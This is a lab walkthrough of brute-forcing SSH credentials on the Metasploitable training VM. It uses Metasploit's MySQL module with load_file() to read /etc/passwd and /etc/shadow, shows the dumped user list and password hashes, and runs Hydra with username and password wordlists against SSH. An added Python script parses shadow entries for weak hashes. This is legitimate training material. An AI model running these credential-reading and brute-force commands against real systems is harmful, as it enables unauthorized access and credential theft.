From charlesreid1

This walks through using Hydra to brute-force login information on Metasploitable.

Also see Hydra.

Procedure

The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:

  • Guess usernames from services
  • Obtain usernames from a file on the machine

It would be great if we could log in via SSH as root, but this is usually disabled. To be successful, we will need a list of users on the system. This can be obtained in many ways, but two methods using SQL servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining the contents of /etc/passwd with Metasploit.

Once we find usernames, we can try and crack the passwords.

  • For password wordlists, use SecLists from Daniel Miessler on Github: https://github.com/danielmiessler/SecLists
  • If we have usernames only, use Hydra to brute-force credentials
  • If we have usernames and password hashes, use John the Ripper to brute-force credentials

Usernames

Finding Usernames via Services

Oftentimes services will create users and will not disable SSH for those accounts. If you're lucky, these service accounts will be less carefully secured than regular user accounts. For example, if a server is running PostgreSQL, there should be a "postgres" user; it may be allowed to log in, and it may even have the password "postgres".

Finding Usernames via MySQL

Hydra can be used to brute-force the SSH credentials. If you have a good guess for the username and password, then use Hydra.

However, if you don't know what username to use, and you know there is a MySQL server listening, you can crack the MySQL server's password, use MySQL's load_file() function to read the /etc/passwd or /etc/shadow file, and use those to obtain usernames and possibly password hashes. These may in turn lead to SSH usernames and passwords. It's a bit cumbersome, but who knows, you might get lucky and find some low-hanging fruit.

Obtaining Usernames Using SQL load_file Function

Usernames on the machine can be obtained from /etc/passwd if we get SQL credentials on the remote machine, because MySQL provides a load_file() function that reads a file from the database server's filesystem (it works only if the database user has the FILE privilege and the server's file-access settings allow it, both of which are the case on Metasploitable).

Here's the recap of getting the contents of that file from the Metasploitable machine's MySQL server (username is root, password is blank) using Metasploit:

Start metasploit:

root@morpheus:~# msfconsole

We're going to use Metasploit's MySQL query auxiliary module, so load it up:

msf > use auxiliary/admin/mysql/mysql_sql

Once we load the module, we have to set the username and password to use. This requires us to know the username and password. You can try an empty password, the word "password", and so on. On Metasploitable, no MySQL root password is set by default:

msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
PASSWORD =>
msf auxiliary(mysql_sql) > set RHOST 10.0.0.27
RHOST => 10.0.0.27

Last, we set the SQL statement that we want Metasploit to run once it connects:

msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select load_file('/etc/passwd')'...
[*]  | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
 |
[*] Auxiliary module execution completed

Reading /etc/shadow

We can also grab the /etc/shadow file, which contains password hashes. Some sample lines:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

There are 8 fields here:

  • Username: the login name.
  • Password: the hashed password. A password should be at least 6-8 characters long and include digits or special characters.
  • Last password change (lastchanged): days since Jan 1, 1970 on which the password was last changed.
  • Minimum: the minimum number of days required between password changes, i.e. the number of days before the user is allowed to change the password again.
  • Maximum: the maximum number of days the password is valid (after that the user is forced to change it).
  • Warn: the number of days before the password expires on which the user is warned that it must be changed.
  • Inactive: the number of days after the password expires before the account is disabled.
  • Expire: days since Jan 1, 1970 on which the account is disabled, i.e. an absolute date after which the login may no longer be used.

The two most important fields, then, are the first two:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

The root and sys users both have real password hashes, so both can log in with a password, and we now have the hashes of those passwords.

However, a * (or a ! character) in place of a password hash means that the account has no usable password, so it cannot be used for password logins such as SSH with a guessed password.

This reduces the list of usable usernames to:

root@morpheus:~# cat users_file
root
sys
klog
msfadmin
postgres
user
service
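As an added example (not part of the original page), here is a Python script that applies the field rules above to /etc/passwd and /etc/shadow text and derives the users_file list, also flagging accounts whose hash scheme is cheap to crack offline, such as md5crypt ($1$), which is what the root and sys hashes shown use. The sample records are constructed; the msfadmin hash is a labelled placeholder, not a real hash.

```python
# Added example, not from the original page. Sample records below are constructed;
# the root/daemon/sys shadow lines mirror the ones shown on the page.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""
SHADOW_SAMPLE = """root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sshd:!:14684:0:99999:7:::
msfadmin:$6$c0nstructed$placeholdernotarealhash:14747:0:99999:7:::
"""
SHADOW_FIELDS = ["user", "hash", "lastchanged", "minimum", "maximum",
                 "warn", "inactive", "expire", "reserved"]
NON_LOGIN_SHELLS = {"", "/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}

def hash_kind(h):
    """Classify the shadow password field: locked, empty, or the crypt scheme."""
    if h == "":
        return "empty"      # no password set: an empty password logs in
    if h.startswith(("*", "!")):
        return "locked"     # the * / ! case described above
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    return "descrypt" if len(h) == 13 else "unknown"   # bare 13 chars = old DES crypt

def audit_accounts(passwd_text, shadow_text):
    """Join shadow hash status with the login shell (7th field of a passwd record)."""
    shells = {f[0]: f[6] for f in (l.split(":") for l in passwd_text.splitlines())
              if len(f) == 7}
    report = {}
    for line in filter(None, shadow_text.splitlines()):
        rec = dict(zip(SHADOW_FIELDS, line.split(":")))
        kind = hash_kind(rec["hash"])
        shell = shells.get(rec["user"], "")
        report[rec["user"]] = {"hash": kind, "shell": shell,
                               "usable": kind != "locked" and shell not in NON_LOGIN_SHELLS,
                               "weak_hash": kind in {"md5crypt", "descrypt", "empty"}}
    return report

def usable_usernames(passwd_text, shadow_text):
    """The users_file list: accounts a password guess could actually hit."""
    report = audit_accounts(passwd_text, shadow_text)
    return sorted(u for u, r in report.items() if r["usable"])
```

On a real host the same audit can be run as root on the live files to find accounts that should be locked or moved to a stronger hash scheme.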

Passwords

Hydra

Hydra is an online brute-force login tool that supports many network services, including SSH. It works by trying username/password pairs against the remote service. It is very slow and should only be used as a last-ditch attempt.

Usage

If we just type hydra, we can see the basic usage:

root@morpheus:~# hydra 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

From the help message, you can see Hydra supports cracking many more services than just SSH:

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Reality Check

Quick reality check: brute-forcing SSH logins is very slow (limited by how many SSH connections a victim's SSH server will accept), so if you have access to /etc/shadow, you might as well crack those passwords offline with John the Ripper.

Using Hydra to Crack SSH Credentials

Once we have a list of users, we can put that in a file and pass it to Hydra using the -L flag. We then pass a list of passwords to try using the -P flag. Here's a sample command:

# hydra -L users_file -P 500-worst-passwords.txt ssh://10.0.0.27:22
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-25 21:45:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 active

This is extremely slow when compared to an offline password-cracking method like John the Ripper - if we have the /etc/shadow file, we should probably use that, instead of trying to brute-force SSH logins.

Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not terribly practical.

John the Ripper

If we are able to obtain a list of users and their password hashes, e.g., from /etc/shadow, we can use John to try and crack passwords via brute force offline.

Use John to Crack Credentials

See Metasploitable/John_Shadow_File

Metasploitable

You can also brute force an SSH login with Metasploit: use the auxiliary/scanner/ssh/ssh_login module.

See Metasploitable/SSH/Exploits#Brute_Force_ssh_login

Flags